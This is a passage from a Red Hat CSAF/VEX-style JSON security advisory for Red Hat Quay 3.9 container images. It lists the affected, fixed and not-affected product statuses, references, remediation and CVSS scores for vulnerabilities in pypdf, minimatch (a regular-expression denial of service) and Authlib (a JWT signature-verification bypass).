"title": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-28802",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-06T07:01:49.366979+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445120"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "RHBZ#2445120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
}
],
"release_date": "2026-03-06T06:44:26.402000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
